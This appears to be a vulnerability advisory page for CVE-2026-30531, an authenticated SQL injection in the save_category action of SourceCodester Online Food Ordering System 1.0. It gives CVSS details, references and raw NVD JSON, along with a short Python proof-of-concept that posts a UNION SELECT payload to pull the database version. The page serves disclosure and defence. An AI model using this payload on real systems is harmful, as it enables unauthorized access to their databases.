CVE-2026-30531

Description

A SQL Injection vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Actions.php file (specifically the save_category action). The application fails to properly sanitize user input supplied to the "name" parameter. This allows an authenticated attacker to inject malicious SQL commands.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oretnom23:online_food_ordering_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Online Food Ordering System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target_url = "http://target.com/Actions.php"
# Attacker needs to be authenticated, provide valid session cookies
cookies = {
    "PHPSESSID": "valid_session_id_here"
}

# Malicious payload to extract database version via SQL Injection
# The 'name' parameter is vulnerable in the save_category action
payload = "test' UNION SELECT 1, version(), 3, 4, 5-- -"

data = {
    "action": "save_category",
    "name": payload
}

response = requests.post(target_url, data=data, cookies=cookies)

if response.status_code == 200:
    print("[+] Payload sent successfully")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Failed to send payload")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30531
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30531
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30531/
[4] VulDB https://vuldb.com/cve/CVE-2026-30531
[5] https://github.com/meifukun/Web-Security-PoCs/blob/main/Online-Food-Ordering-System/SQLi-Actions-saveCategory-name.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30531", "sourceIdentifier": "[email protected]", "published": "2026-03-27T16:16:23.687", "lastModified": "2026-03-30T18:18:11.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A SQL Injection vulnerability exists in SourceCodester Online Food Ordering System v1.0 in the Actions.php file (specifically the save_category action). The application fails to properly sanitize user input supplied to the \"name\" parameter. This allows an authenticated attacker to inject malicious SQL commands."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oretnom23:online_food_ordering_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "0FAA9C4A-10ED-4AA4-8295-F4324DD2F879"}]}]}], "references": [{"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Online-Food-Ordering-System/SQLi-Actions-saveCategory-name.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}